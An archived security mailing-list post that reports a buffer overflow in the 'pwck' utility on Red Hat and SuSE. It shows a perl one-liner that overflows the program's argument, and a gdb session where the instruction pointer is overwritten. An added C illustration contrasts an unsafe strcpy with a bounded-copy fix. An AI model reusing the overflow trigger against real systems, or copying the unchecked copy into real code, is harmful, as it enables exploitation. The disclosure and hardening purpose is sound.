lists.openwall.net | Open Source and information security mailing list archives
From: d4yj4y at yahoo.com (Day Jay)
Subject: Overflow in "pwck" on Redhat 8.x and Suse

d4y-j4y from Chung's Donut Shop has found a problem with "pwck" on Redhat 8.0 and Suse 7.x -- probably an issue with later versions as well.

Per the documentation:

pwck: verifies the integrity of the system authentication information. All entries in the /etc/passwd and /etc/shadow are checked to see that the entry has the proper format and valid data in each field. The user is prompted to delete entries that are improperly formatted or which have other incorrectable errors.

With that in mind, the program is insecure. It's not setuid root, but it could have other implications; I don't know what.

[root@...rmom]# /usr/sbin/pwck `perl -e 'print "Chungs_Donut_Shop" x 135'`
Segmentation fault
[root@...rmom]# interseting
sh: interesting: command not found
[root@...rmom]# gdb /usr/sbin/pwck
GNU gdb 20010316
Copyright 2001 Free Software Foundation, Inc.
GDB is free software, covered by the GNU General Public License, and you are
welcome to change it and/or distribute copies of it under certain conditions.
Type "show copying" to see the conditions.
There is absolutely no warranty for GDB.  Type "show warranty" for details.
This GDB was configured as "i386-suse-linux"...(no debugging symbols found)...
(gdb) set args `perl -e 'print "Z" x 6999'`
(gdb) run
Starting program: /usr/sbin/pwck `perl -e 'print "Z" x 6999'`
(no debugging symbols found)...(no debugging symbols found)...
(no debugging symbols found)...

Program received signal SIGSEGV, Segmentation fault.
0x5a5a5a5a in ?? ()
(gdb) info reg eip
eip            0x5a5a5a5a       0x5a5a5a5a
(gdb) whoa we overwrote the eip
Undefined command: "whoa".  Try "help".
(gdb) quit

So we have overwritten the EIP with ZZZZZZZZZZZZs. It's sleepy. Anyway, too lazy to try to write another non-setuid-root exploit. So, there you go. I also haven't checked out the source because I'm too lazy and I'm not good at reading or really writing code.
I'm also too lazy to find the exact buffer size so fuck you.
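The crash in the report above (EIP reading 0x5a5a5a5a after a 6999-byte argument of 'Z') is the signature of an unbounded copy of a command-line argument into a fixed-size stack buffer, where the overrun reaches the saved return address. The C below is an added illustration for readers of this archive; it is not pwck's source and not part of the original post. It places the hypothetical unsafe pattern next to a bounded version that refuses over-long arguments before touching the buffer. The buffer size, function names and the constructed long input are assumptions, not taken from pwck.

```c
#include <stdio.h>
#include <string.h>
#include <stddef.h>

/* Hypothetical fixed-size destination for a command-line argument.
 * The size is constructed for this illustration, not taken from pwck. */
#define PATH_BUF 256

/* Unsafe pattern (hypothetical): unbounded copy from argv into a stack
 * buffer.  Any argument longer than PATH_BUF-1 bytes writes past the end of
 * buf; a long enough one reaches the saved return address, which is what the
 * 0x5a5a5a5a EIP in the gdb session above shows.  This function is kept
 * only as the "before" picture and is never called with a long argument. */
int copy_arg_unchecked(const char *arg)
{
    char buf[PATH_BUF];
    strcpy(buf, arg);          /* no length check of any kind */
    return (int)strlen(buf);
}

/* Hardened pattern: measure the argument with a bound so the scan itself
 * cannot run past dstlen, reject anything that does not fit with its NUL,
 * and only then copy.  Returns 0 on success, -1 if the argument is too long. */
int copy_arg_checked(const char *arg, char *dst, size_t dstlen)
{
    size_t n = 0;
    while (n < dstlen && arg[n] != '\0') {
        n++;
    }
    if (n >= dstlen) {
        return -1;             /* would not fit (also covers dstlen == 0) */
    }
    memcpy(dst, arg, n);
    dst[n] = '\0';
    return 0;
}

/* Mirrors how a main() should validate argv[1] before using it: a NULL or
 * over-long argument is an error, not a memory write. */
int validate_file_argument(const char *arg)
{
    char buf[PATH_BUF];
    if (arg == NULL) {
        return -1;
    }
    if (copy_arg_checked(arg, buf, sizeof buf) != 0) {
        fprintf(stderr, "argument too long (max %d bytes)\n", PATH_BUF - 1);
        return -1;
    }
    return 0;
}

int main(int argc, char **argv)
{
    /* Constructed input: a 6999-byte run of 'Z', the same length used in
     * the report, so the checked path can be exercised offline. */
    static char longarg[7000];
    memset(longarg, 'Z', sizeof longarg - 1);
    longarg[sizeof longarg - 1] = '\0';

    printf("short arg: %d\n", validate_file_argument("/etc/passwd"));
    printf("long arg:  %d\n", validate_file_argument(argc > 1 ? argv[1] : longarg));
    return 0;
}
```

The point for a maintainer is that the check happens on the length of the input, not on the state of the buffer afterwards: by the time an unbounded strcpy has finished, the damage is done. The same bounded-copy discipline applies to any argv, environment or file-derived string that lands in a fixed buffer, whether or not the binary is setuid.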